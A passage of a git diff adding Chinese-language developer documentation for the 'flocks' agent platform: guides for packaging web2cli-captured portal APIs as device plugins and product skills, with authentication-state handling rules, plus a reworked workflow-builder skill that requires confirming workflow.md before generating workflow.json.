+- 可以补充可选 `username` / `password`，但必须标注它们仅用于认证恢复或浏览器辅助登录，不得作为默认运行时认证入口
+- `cookie`、`csrf_token`、`access_token` 或特定认证头只有在实际站点需要时再补，并在 handler 中明确说明来源与刷新方式
+
+## 最小工具 YAML
+
+MVP 阶段推荐一个分组工具 + 多个 action：
+
+```yaml
+name: acme_portal_ops
+description: >
+  Acme Portal grouped device tool. Use the action parameter to query alerts,
+  assets, and other WebCLI-backed operations.
+description_cn: >
+  Acme Portal 分组设备工具。通过 action 参数调用告警、资产和其他 WebCLI 能力。
+category: custom
+enabled: true
+requires_confirmation: false
+provider: acme_portal_device
+inputSchema:
+  type: object
+  properties:
+    action:
+      type: string
+      enum: [list_alerts, get_asset_detail]
+      description: 统一业务动作名，不要暴露内部实现来源。
+    alert_id:
+      type: string
+      description: 查询资产详情时可选使用的关联标识。
+  required: [action]
+handler:
+  type: script
+  script_file: acme_portal.handler.py
+  function: handle
+```
+
+规则：
+
+- `provider` 必须与 `_provider.yaml.service_id` 一致
+- 高风险写操作必须设置 `requires_confirmation: true`
+- 对外 action 用统一业务语义，不要命名成 `webcli_get_alerts`、`api_get_alerts`
+
+## 最小 handler 结构
+
+MVP 阶段优先单文件 handler，不强制拆 client 模块：
+
+```python
+from __future__ import annotations
+
+from typing import Any
+
+from flocks.config.config_writer import ConfigWriter
+from flocks.tool.registry import ToolContext, ToolResult
+
+SERVICE_ID = "acme_portal_device"
+
+
+def _service_config() -> dict[str, Any]:
+    raw = ConfigWriter.get_api_service_raw(SERVICE_ID)
+    return raw if isinstance(raw, dict) else {}
+
+
+async def handle(ctx: ToolContext, action: str, **params: Any) -> ToolResult:
+    cfg = _service_config()
+    if action == "list_alerts":
+        return ToolResult(success=True, output={"items": [], "source": "webcli_api"})
+    if action == "get_asset_detail":
+        return ToolResult(success=True, output={"item": None, "source": "webcli_api"})
+    return ToolResult(success=False, error=f"Unsupported action: {action}")
+```
+
+要求：
+
+- 通过 `ConfigWriter.get_api_service_raw(SERVICE_ID)` 读取当前设备实例配置
+- handler 内部负责认证头构造、分页、超时、重试和响应归一化
+- handler 默认只读取 `auth_state_path` 指向的 `auth-state.json`；如果文件缺失、不是合法 JSON，或没有匹配当前 Base URL 的 Cookie，应返回明确错误并提示重新登录/保存 state
+- handler 不要 fallback 到内联 `auth_state_json`；这会把路径字符串、占位文本或过期内容误当 JSON 解析，导致设备测试报错不清晰
+- 如果模板提供了 `username` / `password`，handler 也不要在普通 tool 调用里静默自动登录；这些字段只用于后续由 Rex 进入浏览器认证恢复流程时辅助填表
+- CLI 可选保留，但不要让设备运行时通过 subprocess 调 CLI
+
+## 组合 API / WebCLI / 处理逻辑
+
+同一设备可以混合多种能力来源，但对外仍然是统一 action：
+
+- `api`：正式 API，可直接调用
+- `webcli_api`：WebCLI 抓到的隐藏接口
+- `process`：本地字段归一化、过滤、聚合、补全
+- `composed`：先调一种来源，再补另一种来源，最后统一输出
+
+推荐选择顺序：
+
+1. 正式 API 稳定可用时，优先正式 API
+2. 正式 API 缺能力但 WebCLI 接口稳定时，用 `webcli_api`
+3. 需要字段清洗、补全、排序、聚合时，在 handler 内增加 `process`
+4. 需要多个来源补齐同一业务结果时，用 `composed`
+5. 必须验证码、强动态页面或人工交互时，只记录为 browser fallback，不放进默认设备运行时
+6. 如果某个隐藏接口依赖 `Authorization`、`Tdp-Authentication`、CSRF 等临时头，只有在 handler 已实现可靠的恢复/刷新逻辑时才暴露为默认 action；否则保留在 CLI 或文档中，不放进设备默认动作
+
+示例 action 映射：
+
+```yaml
+list_alerts: webcli_api
+get_asset_detail: composed
+list_users: api
+normalize_alert: process
+```
+
+这里的映射可以写进 handler 常量、注释、`notes` 或单独的设计文档，但不要把“来源类型”直接暴露给最终用户。
+
+## 认证失败处理
+
+出现以下情况时，优先按认证失效处理：
+
+- 返回 `401` 或 `403`
+- 返回内容出现 `Unauthorized`、`login`、未登录、无权限
+- Cookie / CSRF / access token 明显过期
+- `auth_state_path` 已存在，但接口仍跳转登录页
+
+处理原则：
+
+1. 不要无限重试
+2. 优先返回明确话术，提示 Rex 使用 `flocks browser` 和对应 skill 的认证失败处理去恢复登录态
+3. 如果设备已配置可选 `username` / `password`，Rex 可以在浏览器恢复流程中读取它们辅助登录；如遇验证码、MFA、短信码或人工确认，立即停下并让用户接管
+4. 登录成功后执行 `flocks browser state save <auth_state_path>` 更新 cookie/state 文件
+5. 如仍失败，再提示用户重新登录或更新设备配置中的认证字段
+6. 如果保留了 CLI，可用 CLI 做一次最小验证
+7. 验证通过后，再让用户回到设备页点击“刷新设备模板”
+
+## `_test.yaml` 建议
+
+如果该 WebCLI 设备已经有最小可验证动作，建议补一个 `_test.yaml`，至少覆盖：
+
+- 一个低风险读操作
+- 最小必填参数
+- 成功时的关键字段断言
+
+这样后续更新 handler 或认证逻辑时更容易回归验证。
+
+## 一句话原则
+
+`web2cli` 生成的 CLI 是中间产物；只有在“安全设备接入”场景下，才把它整理成标准 device 插件，让设备页能识别、配置并调用。
diff --git a/.flocks/plugins/skills/web2cli/references/skill-integration.md b/.flocks/plugins/skills/web2cli/references/skill-integration.md
new file mode 100644
index 000000000..b0e9edc0c
--- /dev/null
+++ b/.flocks/plugins/skills/web2cli/references/skill-integration.md
@@ -0,0 +1,199 @@
+# Web2CLI 结果如何接入 Skill
+
+> 本文说明：`web2cli` 生成 CLI 或 device tool 后，怎样把能力沉淀成可长期维护的产品 skill。
+
+## 结论
+
+无论最终主实现是 CLI 还是 device tool，都必须创建或更新对应产品 skill。skill 是长期入口，负责记录触发条件、模式判断、浏览器经验、认证恢复、接口文档和回归方法。
+
+主实现二选一：
+
+- **CLI 主实现**：CLI 放入 skill 的 `scripts/`，skill 直接调用 CLI。
+- **device tool 主实现**：device plugin 放入 `tools/device/<plugin_id>/`，skill 不放独立 CLI 主实现，只记录 device tool 的使用、验证和认证恢复方式。
+
+## 命名约定
+
+- skill 目录：`$HOME/.flocks/plugins/skills/<name>-use/`
+- 默认认证状态：`~/.flocks/browser/<name>/auth-state.json`
+- `<name>` 使用产品或系统的稳定标识，不用一次性任务名
+- 目录名可以保留 `-`，例如 `tdp-use`
+- Python 文件名统一用 `_`
+
+不要把最终能力命名成 `export_data`、`test_capture`、`web2cli_demo` 这类临时任务名。
+
+## 共用 Skill 结构
+
+CLI 和 device tool 两种场景都必须保留这些文件：
+
+```text
+$HOME/.flocks/plugins/skills/<name>-use/
+├── SKILL.md
+└── references/
+    ├── browser-workflow.md
+    └── cli-reference.md
+```
+
+其中：
+
+- `SKILL.md`：定义触发条件、模式判断、主实现落点和退回浏览器的条件
+- `references/browser-workflow.md`：记录登录入口、保存 state、认证恢复、页面操作经验和重新抓包方法
+- `references/cli-reference.md`：记录 CLI 或 device tool 的能力、参数、输出字段、验证方式和回归方法
+
+`references/cli-reference.md` 是历史沿用的统一接口文档名。即使主实现是 device tool，也继续使用这个文件承载 device tool 的参数、输出和验证说明。
+
+## CLI 主实现的 Skill 集成
+
+如果第 8 步选择通用 CLI 作为主实现，skill 还必须包含：
+
+```text
+$HOME/.flocks/plugins/skills/<name>-use/
+└── scripts/
+    ├── <name>_cli.py
+    └── config.py
+```
+
+从临时抓包结果集成到 skill 时：
+
+```bash
+SKILL_ROOT="$HOME/.flocks/plugins/skills/<name>-use"
+
+mkdir -p "$SKILL_ROOT/scripts" "$SKILL_ROOT/references"
+mkdir -p "$HOME/.flocks/browser/<name>"
+
+cp "$CAPTURE_ROOT/<normalized_capture_name>_cli.py" \
+  "$SKILL_ROOT/scripts/<name>_cli.py"
+
+cp "$CAPTURE_ROOT/auth-state.json" \
+  "$HOME/.flocks/browser/<name>/auth-state.json"
+```
+
+随后补齐：
+
+1. 在 `scripts/config.py` 中把认证状态默认值指向 `~/.flocks/browser/<name>/auth-state.json`
+2. 在 `references/cli-reference.md` 中写清楚 CLI 参数、环境变量、输出字段和示例
+3. 在 `references/browser-workflow.md` 中写清楚浏览器登录、保存 state、认证恢复和重新抓包步骤
+4. 在 `SKILL.md` 中说明什么时候优先走 CLI，什么时候退回浏览器
+
+推荐的配置写法：
+
+```python
+import os
+from pathlib import Path
+
+AUTH_STATE_FILE = Path(
+    os.getenv(
+        "<NAME>_AUTH_STATE",
+        Path.home() / ".flocks" / "browser" / "<name>" / "auth-state.json",
+    )
+)
+```
+
+## Device Tool 主实现的 Skill 集成
+
+如果第 8 步选择 device plugin 作为主实现，skill 只放维护入口和文档，不放 `scripts/<name>_cli.py` 主实现。
+
+必须补齐：
+
+1. 在 `SKILL.md` 中说明当前能力最终落点是 `tools/device/<plugin_id>/`
+2. 在 `references/cli-reference.md` 中写清楚 device tool 的 action、参数、输出字段、验证方式和回归方法
+3. 在 `references/browser-workflow.md` 中写清楚浏览器登录、保存 state、认证恢复、重新抓包步骤和 device 配置依赖
+4. 将认证状态默认位置统一到 `~/.flocks/browser/<name>/auth-state.json`
+
+device 场景不要在 skill 的 `scripts/` 目录下放一份与 device tool 平行演进的 CLI 主实现。如确实需要 CLI 做调试或回归，只能放在 device plugin 目录下作为可选辅助文件，并在 `references/cli-reference.md` 明确它不是运行时主路径。
+
+## `SKILL.md` 要求
+
+`SKILL.md` 必须遵守 Flocks 的标准 skill 格式：
+
+- 文件开头必须是 YAML frontmatter，第一行必须为 `---`
+- frontmatter 至少包含 `name` 和 `description`
+- `name` 使用稳定的 skill 标识，推荐与目录名一致，例如 `<name>-use`
+- frontmatter 结束后，再写正文标题、触发条件、模式判断和使用说明
+
+最小模板示例：
+
+```md
+---
+name: test-use
+description: 用于查询 Test 平台数据，支持通过 CLI 或 device tool 快速查询，认证失效时退回浏览器模式。
+---
+
+# Test Use
+
+## 触发条件
+
+- 用户提到 Test 平台
+- 用户需要查询 Test 数据
+
+## 模式判断
+
+### CLI / Device Tool 模式（默认）
+
+- 适用于快速查询和批量读取数据
+
+### 浏览器模式
+
+- 适用于需要页面交互、导出、重新登录或重新抓包的场景
+```
+
+不要把 `SKILL.md` 直接写成普通 Markdown 文档，例如下面这种格式是无效的：
+
+```md
+# Test Use
+```
+
+## `browser-workflow.md` 写作指南
+
+推荐写入：
+
+- 固定的登录入口、首页、详情页、导出页 URL
+- 已确认的稳定登录方法
+- 认证失效识别与恢复步骤
+- 已验证的页面操作路径、等待条件、iframe、虚拟列表或 SPA 特征
+- 默认 state 路径，例如 `~/.flocks/browser/<name>/auth-state.json`
+- CLI / device tool 与浏览器的分工边界
+- web2cli 过程中的踩坑、注意事项
+
+不要写入：
+
+- cookie、token、密码、短信码、TOTP 等敏感信息
+- 一次性的 `@eN` ref、临时 tab id、临时 selector、像素坐标
+- 本次任务的操作流水账
+
+## 认证失败怎么处理
+
+CLI 或 device tool 调用出现以下情况时，优先按认证失效处理：
+
+- 返回 `401` 或 `403`
+- 返回内容出现 `Unauthorized`、`login`、未登录、无权限
+- `auth-state.json` 已存在，但请求仍然被重定向到登录页
+
+处理原则：
+
+1. 不要无限重试
+2. 请求用户重新通过浏览器登录
+3. 登录完成后，重新保存认证状态到默认路径
+4. 再重试一次 CLI 或 device tool
+
+默认认证文件路径固定为：
+
+```bash
+~/.flocks/browser/<name>/auth-state.json
+```
+
+保存方式示例：
+
+```bash
+mkdir -p "$HOME/.flocks/browser/<name>"
+flocks browser state save "$HOME/.flocks/browser/<name>/auth-state.json"
+```
+
+如果用户重新登录并保存 state 后仍然失败，再继续排查：
+
+- `BASE_URL` 是否写错
+- 当前账号是否确实有接口权限
+- 站点是否还有额外 header / token / csrf 依赖
+
+## 一句话原则
+
+`web2cli` 的临时抓包结果不是最终交付。最终要么沉淀为 skill `scripts/` 下的稳定 CLI，要么沉淀为 device plugin 下的 device tool；两种方式都必须配套产品 skill 文档入口和统一认证状态路径。
diff --git a/.flocks/plugins/skills/workflow-builder/SKILL.md b/.flocks/plugins/skills/workflow-builder/SKILL.md
index 36475ffcf..dfe3947c1 100644
--- a/.flocks/plugins/skills/workflow-builder/SKILL.md
+++ b/.flocks/plugins/skills/workflow-builder/SKILL.md
@@ -6,9 +6,11 @@ description: 根据自然语言描述生成 flocks 内置工作流（workflow.md
 
 # Workflow Builder
 
-分七个阶段构建工作流：**场景确认与流程设计** → **简化 JSON 预览循环** → **完整 workflow.md** → **完整 workflow.json** → **逐节点测试** → **集成测试** → **性能评估与优化**。
+创建模式按以下顺序构建工作流：**场景确认与流程设计** → **确认 workflow.md 文档语言** → **workflow.md 草稿与确认循环** → **workflow.json 生成与验证** → **逐节点测试** → **集成测试** → **性能评估与优化**。
 
 > **产物**：`workflow.json` 中所有可执行节点均为 `type="python"` 并自带 `code`。最终交付物固定为：`workflow.md`、`workflow.json`。
+>
+> **顺序强制**：创建工作流时，`workflow.md` 是唯一的人类意图源。必须先询问用户需要中文还是英文流程说明文档，再按所选语言创建并确认 `workflow.md`，最后基于已确认的 `workflow.md` 生成 `workflow.json`。在 `workflow.md` 写入并确认前，严禁写入或覆盖 `workflow.json`。
 
 ## 参考资料（按需读取）
 
@@ -16,6 +18,10 @@ description: 根据自然语言描述生成 flocks 内置工作流（workflow.md
 |------|------|---------|
 | [references/reference.md](references/reference.md) | 节点类型详解、出边选择行为、分支/循环/Join 规则、Edge Mapping 指南、Tool vs LLM 决策、文件输出规则、报告生成模板、`workflow.json` 骨架模板 | **生成 `workflow.json` 前建议读取** |
 | [references/composition.md](references/composition.md) | 嵌套工作流（subworkflow）组合格式与展开规则 | 仅在用户需要嵌套工作流时读取 |
+| [references/workflow_zh.md](references/workflow_zh.md) | 中文 `workflow.md` 结构模板 | 用户选择中文流程说明文档时读取 |
+| [references/workflow_en.md](references/workflow_en.md) | English `workflow.md` structure template | 用户选择英文流程说明文档时读取 |
+| [references/workflow_template/](references/workflow_template/) | 工作流创建参考包，包含标准 `workflow.md`、`workflow.json`、`config.json`、`guide.md` 和 `meta.json` 模板 | **创建工作流、生成配置模板或补齐 guide.md 前按需读取** |
+| `~/.flocks/plugins/workflows/stream_alert_denoise/workflow.md` | 已成型业务工作流示例，展示“功能、流程、输入输出、模块逻辑、发布配置、编辑指南”的写法 | 文件存在且需要参考真实工作流表达时读取 |
 
 ---
 
@@ -30,15 +36,15 @@ description: 根据自然语言描述生成 flocks 内置工作流（workflow.md
 [ ] 1.   场景深度确认：与用户对话，明确业务场景与核心目标
 [ ] 1.   输出思考维度分析 + Mermaid 流程简图，与用户沟通对齐
 [ ] 1.   获取样例数据（用户上传或自动构造后确认）
-[ ] 2.   生成简化版预览 JSON（仅节点名称+描述，无代码）
-[ ] 2.   写入简化 workflow.json 文件，供页面展示流程图
-[ ] 2.   向用户展示并收集修改建议（循环直至满意）
-[ ] 3.   生成完整 workflow.md（人读描述）
-[ ] 3.   写入 workflow.md 文件
-[ ] 3.   向用户展示流程摘要并请求确认
-[ ] 4.   读取 reference.md
-[ ] 4.   生成完整 workflow.json（含代码）
-[ ] 4.   写入 workflow.json 文件
+[ ] 2.   用 Question 工具确认 workflow.md 使用中文还是英文
+[ ] 2.   读取对应语言模板 workflow_zh.md 或 workflow_en.md，以及可用业务示例
+[ ] 2.   生成单份 workflow.md 草稿（人读描述，包含功能、流程、节点、输入输出、处理逻辑）
+[ ] 2.   写入 workflow.md 文件，供页面编辑器展示
+[ ] 2.   向用户展示流程摘要并收集修改建议（循环直至满意）
+[ ] 2.   确认 workflow.md 已是最新意图源
+[ ] 3.   读取 reference.md
+[ ] 3.   基于已确认 workflow.md 生成完整 workflow.json（含代码）
+[ ] 3.   写入 workflow.json 文件
 [ ] 4.   验证 JSON 格式 + Python 语法
 [ ] 4.   保存样例数据到 /api/workflow/{id}/sample-inputs
 [ ] 5.   逐节点测试：节点 1 - <node_id>
@@ -131,125 +137,84 @@ flowchart TD
 
 ---
 
-## 2. 第二阶段：简化版 JSON 预览与确认循环
-
-> 目标：在投入完整代码编写之前，让用户在页面上直观地看到流程图，并就节点/边的设计提出修改建议。
-
-### 2.1 生成简化版 workflow.json
-
-生成一份**只有结构、没有代码**的简化 JSON 文件：
-
-- 每个节点使用 `type="logic"`（只需 `description`，无需 `code`）
-- 包含节点的 `id`、`name`（可读名称）、`description`（功能说明）
-- 包含完整的 `edges`（`from`、`to`、`label`）
-- **不包含任何 Python 代码**
-
-简化 JSON 最小结构示例：
-
-```json
-{
-  "id": "alert_triage",
-  "name": "告警分级调查",
-  "description": "自动化 NDR 告警调查工作流",
-  "start": "receive_alert",
-  "nodes": [
-    {
-      "id": "receive_alert",
-      "type": "logic",
-      "name": "接收告警",
-      "description": "接收输入告警，提取 IP、端口、协议等关键字段"
-    },
-    {
-      "id": "check_ip_type",
-      "type": "branch",
-      "name": "判断 IP 类型",
-      "description": "判断源 IP 是内网地址还是外网地址，分支处理"
-    },
-    {
-      "id": "query_threat_intel",
-      "type": "logic",
-      "name": "查询威胁情报",
-      "description": "调用威胁情报工具查询外部 IP 的恶意评分、标签"
-    },
-    {
-      "id": "generate_report",
-      "type": "logic",
-      "name": "生成分析报告",
-      "description": "汇总所有上下文，由 LLM 生成结构化调查报告"
-    }
-  ],
-  "edges": [
-    { "from": "receive_alert", "to": "check_ip_type", "order": 0 },
-    { "from": "check_ip_type", "to": "query_threat_intel", "label": "外网", "order": 0 },
-    { "from": "query_threat_intel", "to": "generate_report", "order": 0 }
-  ]
-}
-```
+## 2. 第二阶段：生成并确认 workflow.md（人读意图源）
 
-### 2.2 写入文件并展示
+> 目标：先把工作流的业务意图、节点结构、输入输出和处理逻辑写成可读、可编辑的 `workflow.md`。页面左侧编辑器以 `workflow.md` 表达工作流，用户应先在这里确认意图；只有确认后才能生成 `workflow.json`。
 
-1. 将简化 JSON 写入规范目录下的 `workflow.json`（**必须使用绝对路径**，见第 9 节）：用户级为 `~/.flocks/plugins/workflows/<id>/`，项目级为 `<workspace>/.flocks/plugins/workflows/<id>/`
-2. 在消息中告知用户：「已更新流程图，请在工作流页面查看。对节点名称、描述或流程结构有什么修改建议？」
+### 2.0 文档语言选择（必须）
 
-### 2.3 用户反馈循环（循环直至满意）
+创建 `workflow.md` 前，必须用 `Question` 工具询问用户需要哪种流程说明文档：
 
-收集用户的修改建议，按照以下循环执行，**直到用户确认满意**：
+- 中文流程说明文档：读取 [references/workflow_zh.md](references/workflow_zh.md)，并可参考 [references/workflow_template/workflow.md](references/workflow_template/workflow.md) 的章节完整性，生成中文 `workflow.md`。
+- English workflow specification：读取 [references/workflow_en.md](references/workflow_en.md)，并可参考 [references/workflow_template/workflow.md](references/workflow_template/workflow.md) 的章节完整性，生成英文 `workflow.md`。
 
-```
-接收用户反馈
-  ↓
-分析修改需求（增/删节点、改描述、调整边关系）
-  ↓
-更新简化 JSON
-  ↓
-重新写入文件
-  ↓
-向用户展示更新摘要，询问是否满意
-  ↓
-[满意] → 进入第三阶段
-[还有修改] → 重新循环
-```
-
-> **提示**：前端检测到 `workflow.json` 更新后会自动刷新流程图，用户无需手动刷新。
-
----
-
-## 3. 第三阶段：生成完整 workflow.md（人读描述）
+规则：
 
-> 以第一阶段确认的流程结构为基础，生成**操作手册级别**的详细流程文档。
+- 工作流目录里最终只写一份 `workflow.md`。
+- 不要在工作流目录里创建 `workflow_zh.md`、`workflow_en.md`、`workflow.en.md` 或其它语言副本。
+- `workflow_zh.md` / `workflow_en.md` 只是本 skill 内部的结构模板。
+- `references/workflow_template/` 只是本 skill 内部的创建参考包，严禁复制成可扫描的 `workflow_template` 工作流目录；需要模板内容时，只读取其中的文件并改造成当前真实工作流。
+- 不要根据用户当前会话语言自动猜测文档语言；创建 `workflow.md` 前必须明确询问并得到选择。
 
-### 核心要求
+### 2.1 核心要求
 
-每个步骤必须包含：
+`workflow.md` 必须让人读得懂，也必须足够结构化，便于后续稳定生成 `workflow.json`。每个步骤必须包含：
 
+- **功能概述**：用人能理解的话说明这个工作流解决什么问题、不解决什么问题。
+- **总体流程**：用箭头、表格或 Mermaid 描述节点顺序和职责。
 - **输入/输出**：数据来源、格式、用途。
-- **处理逻辑**：具体操作步骤、判定条件、循环方式、异常处理。
+- **模块逻辑**：每个节点的职责、处理步骤、判定条件、循环方式、异常处理。
 - **工具/LLM 标注**：明确该步是 Tool-driven 还是 LLM-driven（详细决策指南见 [reference.md § Tool vs LLM](references/reference.md#5-tool-vs-llm-决策指南)）。
   - **推荐组合**：`tool.run_safe(...)` 获取数据 → `llm.ask(...)` 分析 → `tool.run('write', ...)` 落盘。
   - **默认使用 `tool.run_safe()`**，返回 `{"success", "text", "obj", "error"}` 统一包络。
 - **文件落盘**：节点有任何文件输出时，统一写入 `~/.flocks/workspace/outputs/<YYYY-MM-DD>/` 目录下，详见 [reference.md § 文件输出规则](references/reference.md#6-文件输出规则)。
 - **决策分支**：写清条件、各分支处理、跳转规则。
+- **发布和配置**：写清 API、Syslog、Kafka、Webhook、Schedule 等入口是否支持，运行态配置由 `config.json` 模板和 Storage/SQL 管理。
+- **编辑指南**：告诉用户修改输入、节点逻辑、输出、发布方式时应该优先改哪里。
 - **报告结构**（若涉及）：除非用户要求简化，需包含摘要、分析、发现、建议、来源（模板见 [reference.md § 报告生成](references/reference.md#7-报告生成最佳实践)）。
 
-### ⚠️ 两步交付
+### 2.2 写入 workflow.md
 
-1. 先用 `write` 工具将 `workflow.md` **写入文件**（路径与第 9 节一致，例如 `.../plugins/workflows/<id>/workflow.md`）。
+1. 先按用户选择的语言模板生成内容，再用 `write` 工具将单份 `workflow.md` **写入文件**（路径与第 9 节一致，例如 `.../plugins/workflows/<id>/workflow.md`）。
    - **⚠️ 路径必须使用绝对路径**：全局目录可用 `python3 -c "import os; print(os.path.expanduser('~/.flocks/plugins/workflows/<id>'))"`；项目目录可先解析 workspace（从 cwd 向上第一个含 `.flocks` 的目录）再拼接 `/.flocks/plugins/workflows/<id>`。
    - **严禁**使用未展开的相对路径（如 `.flocks/plugins/workflows/<id>/` 相对仓库根随手写入错误位置），否则 WebUI 可能无法从实际扫描目录读到文件。
-2. 写入成功后，用 `Question` 工具向用户展示流程摘要并请求确认（"确认工作流" / "修改工作流"）。确认后进入第四阶段生成 `workflow.json`。
+   - **严禁**同时写入 `workflow.en.md` 或语言副本；UI 和生成流程只认当前工作流目录下的 `workflow.md`。
+2. 写入成功后，在消息中说明：「已创建 `workflow.md`，请在左侧编辑器查看并确认。需要调整节点、输入输出或处理逻辑时，请先改 `workflow.md`。」
+3. 需要用户确认是否进入 `workflow.json` 生成时，必须使用 `Question` 工具或等待页面 diff 的接受/拒绝结果；不要用普通文本提问替代确认。
+
+### 2.3 用户反馈循环（循环直至满意）
+
+收集用户对 `workflow.md` 的修改建议，按照以下循环执行，**直到用户确认满意**：
+
+```
+接收用户反馈
+  ↓
+分析修改需求（功能描述、节点职责、输入输出、处理逻辑、分支关系）
+  ↓
+更新 workflow.md
+  ↓
+重新写入文件
+  ↓
+向用户展示更新摘要，并用 Question 工具或页面 diff 请用户确认
+  ↓
+[满意] → 进入第三阶段，基于已确认 workflow.md 生成 workflow.json
+[还有修改] → 继续循环
+```
+
+> **禁止事项**：不要为了提前展示流程图而先写一个简化 `workflow.json`。当前创建流程必须让 `workflow.md` 先落盘并完成确认，`workflow.json` 只能作为已确认 `workflow.md` 的机器执行产物。
 
 ---
 
-## 4. 第四阶段：生成完整 workflow.json（机器执行）
+## 3. 第三阶段：生成完整 workflow.json（机器执行）
 
-根据 `workflow.md` 生成严格可执行的 `workflow.json`。**生成前建议读取 [references/reference.md](references/reference.md)**。
+根据已确认的 `workflow.md` 生成严格可执行的 `workflow.json`。**生成前必须读取最新磁盘上的 `workflow.md`，并建议读取 [references/reference.md](references/reference.md)**。
 
-### 4.0 节点生成策略
+### 3.0 节点生成策略
 
 - **主路径**：每个可执行步骤 → `type="python"` 节点，必须同时包含 `code`（执行逻辑）+ `description`（文档说明）。
 - **兜底**：`logic` 节点仅在用户明确要求"不写代码"或快速原型时使用，运行时由 codegen 兜底。
 
-### 4.1 运行时硬约束
+### 3.1 运行时硬约束
 
 **顶层字段：**
 
@@ -273,7 +238,7 @@ flowchart TD
 
 - JSON 中用 `"from"` 而非 `"from_"`；`from`/`to` 引用存在的 node id；`order` ≥ 0。
 
-### 4.2 映射规则
+### 3.2 映射规则
 
 - `workflow.md` 每步对应一个节点，`id` 用 snake_case。
 - md 中写的输出字段，必须在 `outputs[...]` 中体现。
@@ -281,7 +246,7 @@ flowchart TD
 - 下游节点如需 `tool.run(..., **inputs)`，用 `edge.mapping`/`edge.const` 规整输入到匹配工具参数形状。
 - 详细 Mapping 指南见 [reference.md § Edge Mapping](references/reference.md#4-edge-mapping-详细指南)。
 
-### 4.3 分支/循环与 Join
+### 3.3 分支/循环与 Join
 
 - **branch/loop 选边**：`bool` 值 label 用 `"true"`/`"false"`；`str` 值精确匹配；无命中回退到空 label 默认边。上游必须把 `select_key` 所需字段写入 payload。
 - **分支汇合（强制）**：
@@ -291,7 +256,7 @@ flowchart TD
   - 推荐模式：join 节点（python, `join=true`）归一化多分支输出 → 再传给后续步骤
 - **嵌套工作流**：见 [references/composition.md](references/composition.md)。
 
-### 4.4 代码实现
+### 3.4 代码实现
 
 **辅助函数：**
 
@@ -347,7 +312,20 @@ elif isinstance(obj, str):
 - **文件输出**：有文件输出时写入 `~/.flocks/workspace/outputs/<YYYY-MM-DD>/`（详见全局文件输出约定）
 - **数据传递**：`inputs` 和 `outputs` 字典，运行时浅合并 `payload = {**inputs, **outputs}`
 
-> **⚠️** 生成后必须使用 `write` 写入到文件，并验证：1) `json.load` 确认 JSON 格式正确；2) 对每个 `type="python"` 节点的 `code` 执行 `compile(code, "<node_id>", "exec")` 确认 Python 语法正确。若语法报错，修复后重新写入。
+> **⚠️** 生成后必须使用 `write` 写入到文件。写入完成后进入第四阶段验证，验证通过前不得进入逐节点测试。
+
+---
+
+## 4. 第四阶段：验证 workflow.json 与保存样例
+
+`workflow.json` 写入后必须完成以下验证与准备工作：
+
+1. 用 `json.load` 确认 JSON 格式正确。
+2. 对每个 `type="python"` 节点的 `code` 执行 `compile(code, "<node_id>", "exec")` 确认 Python 语法正确。
+3. 若格式或语法报错，修复后重新写入 `workflow.json` 并再次验证。
+4. 将阶段 1 收集的样例数据保存到 `POST /api/workflow/{id}/sample-inputs`，body 为 `{ "sampleInputs": <样例 JSON 对象> }`。
+
+只有以上步骤全部通过后，才能进入第五阶段逐节点测试。
 
 ---
 
@@ -523,7 +501,7 @@ Body: { "inputs": <样例数据> }
 - **单节点改动** → 使用 `edit` 工具精准替换目标字段
 - **多节点改动 / 结构重组** → 整体覆写
 
-**遵守所有 workflow.json 约束**（见第 4 节规范）。
+**遵守所有 workflow.json 约束**（见第 3 节规范）。
 
 ### 8.4 验证与写回
 
@@ -607,27 +585,11 @@ python3 -c "from pathlib import Path; p=Path.cwd(); ws=next((x for x in [p,*p.pa
 
 ---
 
-## workflow.md 标准模板
-
-```markdown
-# [Workflow Name]
+## workflow.md 模板资源
 
-## 业务场景
-[目标和背景]
+本 skill 内置两份流程说明文档模板：
 
-## 流程步骤
+- 中文模板：[references/workflow_zh.md](references/workflow_zh.md)
+- English template: [references/workflow_en.md](references/workflow_en.md)
 
-### 1. [步骤名称]
-- **描述**: [操作手册级别描述]
-- **工具/模型**: [Tool: xxx / LLM: xxx]
-- **输入**: [字段名: 来源和格式]
-- **输出**: [字段名: 格式和用途]
-- **处理逻辑**:
-  - [操作步骤]
-  - [工具调用：`result = tool.run_safe('name', ...)`，用 `result["text"]` 取结果]
-- **决策分支**（如适用）:
-  - 条件 → 分支处理
-
-### 2. [步骤名称]
-...
-```
+创建工作流时，先用 `Question` 工具确认用户需要哪种语言，然后读取对应模板，把真实内容写入工作流目录下唯一的 `workflow.md`。
diff --git a/.flocks/plugins/skills/workflow-builder/references/composition.md b/.flocks/plugins/skills/workflow-builder/references/composition.md
index 038bd082b..79ffea1b9 100644
--- a/.flocks/plugins/skills/workflow-builder/references/composition.md
+++ b/.flocks/plugins/skills/workflow-builder/references/composition.md
@@ -18,6 +18,10 @@
 {
   "format": "flocks-workflow-composition-v1",
   "name": "your_workflow_name",
+  "nameI18n": {
+    "zh-CN": "你的工作流名称",
+    "en-US": "Your Workflow Name"
+  },
   "start": "node_id",
   "nodes": [
     {
diff --git a/.flocks/plugins/skills/workflow-builder/references/reference.md b/.flocks/plugins/skills/workflow-builder/references/reference.md
index 8b91d161e..2fa7458aa 100644
--- a/.flocks/plugins/skills/workflow-builder/references/reference.md
+++ b/.flocks/plugins/skills/workflow-builder/references/reference.md
@@ -195,6 +195,10 @@
 ```json
 {
   "name": "my_workflow",
+  "nameI18n": {
+    "zh-CN": "我的工作流",
+    "en-US": "My Workflow"
+  },
   "description": "工作流用途说明（可选）",
   "start": "step_1",
   "nodes": [
diff --git a/.flocks/plugins/skills/workflow-builder/references/workflow_en.md b/.flocks/plugins/skills/workflow-builder/references/workflow_en.md
new file mode 100644
index 000000000..18b9d666d
--- /dev/null
+++ b/.flocks/plugins/skills/workflow-builder/references/workflow_en.md
@@ -0,0 +1,189 @@
+# [workflow_id]
+
+> This is an English `workflow.md` structure template. When creating a workflow, replace placeholders with real business content and write only the final result to `workflow.md` in the workflow directory.
+
+## 1. Functional Overview
+
+`[workflow_id]` is a [one-sentence description of the workflow type].
+
+It mainly solves three things:
+
+- [Goal 1: what information the workflow receives or organizes.]
+- [Goal 2: how it processes, decides, filters, aggregates, or analyzes.]
+- [Goal 3: what it outputs and who uses the result.]
+
+Suitable scenarios:
+
+- [Scenario 1]
+- [Scenario 2]
+- [Scenario 3]
+
+Out of scope:
+
+- [Boundary 1]
+- [Boundary 2]
+- Do not store plaintext secrets. Credentials, enable/disable state, and runtime configuration should be managed by configuration and storage.
+
+## 2. Flow Map
+
+The workflow runs in this order:
+
+```text
